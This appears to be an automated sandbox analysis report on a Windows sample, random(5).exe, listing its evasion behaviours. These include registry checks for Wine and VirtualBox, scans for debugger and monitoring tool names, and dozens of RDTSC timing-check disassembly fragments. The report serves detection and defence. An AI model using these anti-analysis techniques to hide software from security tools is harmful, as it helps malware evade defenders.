Source: C:\Users\user\Desktop\random(5).exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\random(5).exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: PROCMON.EXE
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: X64DBG.EXE
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WINDBG.EXE
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: WIRESHARK.EXE

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FBCF8 second address: 16FBCFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16FBCFC second address: 16FBD00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17000DF second address: 17000EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17000EA second address: 17000EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17000EF second address: 1700109 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C385h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1700268 second address: 170026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 170026C second address: 170028F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CD4C37Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jo 00007F519CD4C382h 0x00000011 jl 00007F519CD4C376h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 170028F second address: 1700299 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 pop eax 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1700299 second address: 17002C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C383h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F519CD4C37Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 jno 00007F519CD4C376h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1700947 second address: 170094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 170094B second address: 170096A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C389h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17030F6 second address: 1703131 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F519CFC89B8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f jmp 00007F519CFC89C5h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F519CFC89C5h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1703131 second address: 170316B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jmp 00007F519CD4C388h 0x00000014 pop eax 0x00000015 mov esi, dword ptr [ebp+122D3A6Fh] 0x0000001b lea ebx, dword ptr [ebp+12455EB8h] 0x00000021 xchg eax, ebx 0x00000022 push ecx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 170316B second address: 170316F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172455B second address: 1724574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F519CD4C384h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16F015E second address: 16F0177 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CFC89C3h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722566 second address: 172257F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F519CD4C376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F519CD4C37Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172257F second address: 172258B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F519CFC89B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722848 second address: 1722860 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C384h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17229A0 second address: 17229BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jmp 00007F519CFC89C3h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722B16 second address: 1722B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722B1C second address: 1722B43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jng 00007F519CFC89B6h 0x0000000e jmp 00007F519CFC89C8h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722B43 second address: 1722B49 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722FA2 second address: 1722FC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722FC3 second address: 1722FC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1722FC7 second address: 1722FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F519CFC89B6h 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172328A second address: 1723294 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F519CD4C376h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17233C8 second address: 17233EB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F519CFC89B6h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F519CFC89C3h 0x00000012 push esi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723569 second address: 172356D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DDC second address: 1723DE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DE7 second address: 1723DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DEB second address: 1723DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DEF second address: 1723DF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DF5 second address: 1723DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723DFB second address: 1723E01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723E01 second address: 1723E2F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C2h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jbe 00007F519CFC89B8h 0x00000015 js 00007F519CFC89BAh 0x0000001b push eax 0x0000001c pop eax 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1723E2F second address: 1723E48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F519CD4C383h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1724106 second address: 1724113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 je 00007F519CFC89B6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1724113 second address: 1724119 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1724119 second address: 172412A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89BDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172412A second address: 172415D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F519CD4C381h 0x0000000f jns 00007F519CD4C376h 0x00000015 jmp 00007F519CD4C37Ch 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172415D second address: 1724166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1724166 second address: 172416C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172416C second address: 1724170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1728DF4 second address: 1728DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1729325 second address: 172933C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89BBh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172933C second address: 1729358 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C388h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172AAA6 second address: 172AAAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172AAAC second address: 172AAB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172BF9F second address: 172BFA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 172BFA3 second address: 172BFB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16EE667 second address: 16EE695 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C5h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F519CFC89BFh 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16EE695 second address: 16EE699 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173227F second address: 173229A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007F519CFC89BEh 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1731A9C second address: 1731AB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F519CD4C37Dh 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 16F6C2A second address: 16F6C34 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1735645 second address: 173564B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173564B second address: 1735651 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1735651 second address: 1735655 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1735655 second address: 1735673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F519CFC89C2h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1735673 second address: 173567C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173567C second address: 17356AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jno 00007F519CFC89CCh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17356AC second address: 17356C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F519CD4C378h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17357B5 second address: 17357BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17357BA second address: 17357C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17359F2 second address: 17359FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1735BFC second address: 1735C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F519CD4C376h 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 push ebx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17361AF second address: 17361B5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17361B5 second address: 17361BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 17361BB second address: 17361BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173630D second address: 173631B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F519CD4C376h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173897E second address: 173898E instructions: 0x00000000 rdtsc 0x00000002 jns 00007F519CFC89B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173898E second address: 1738992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1738992 second address: 1738996 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1739B83 second address: 1739BB7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F519CD4C376h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F519CD4C37Ch 0x00000013 jmp 00007F519CD4C386h 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173BC3F second address: 173BC43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173BC43 second address: 173BCD4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F519CD4C378h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 00000017h 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D1C90h], esi 0x0000002c mov esi, dword ptr [ebp+122D3963h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebx 0x00000037 call 00007F519CD4C378h 0x0000003c pop ebx 0x0000003d mov dword ptr [esp+04h], ebx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc ebx 0x0000004a push ebx 0x0000004b ret 0x0000004c pop ebx 0x0000004d ret 0x0000004e add esi, 2E425741h 0x00000054 jmp 00007F519CD4C384h 0x00000059 push ecx 0x0000005a mov di, 44D9h 0x0000005e pop esi 0x0000005f push 00000000h 0x00000061 mov di, si 0x00000064 push eax 0x00000065 push ebx 0x00000066 push eax 0x00000067 push edx 0x00000068 push esi 0x00000069 pop esi 0x0000006a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173AF4F second address: 173AF5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jng 00007F519CFC89BCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1743C89 second address: 1743C94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1743C94 second address: 1743CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F519CFC89BEh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1744B71 second address: 1744BA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C386h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a je 00007F519CD4C39Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F519CD4C384h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173EEE7 second address: 173EEF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F519CFC89B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 173FFBA second address: 173FFC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 1744BA8 second address: 1744C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007F519CFC89B8h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 00000016h 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 push edi 0x00000025 jbe 00007F519CFC89C6h 0x0000002b jmp 00007F519CFC89C0h 0x00000030 pop ebx 0x00000031 push 00000000h 0x00000033 call 00007F519CFC89BDh 0x00000038 jl 00007F519CFC89BCh 0x0000003e mov edi, dword ptr [ebp+122D39ABh] 0x00000044 pop ebx 0x00000045 push 00000000h 0x00000047 mov di, B9F5h 0x0000004b push eax 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push edx 0x00000050 pop edx 0x00000051 rdtsc
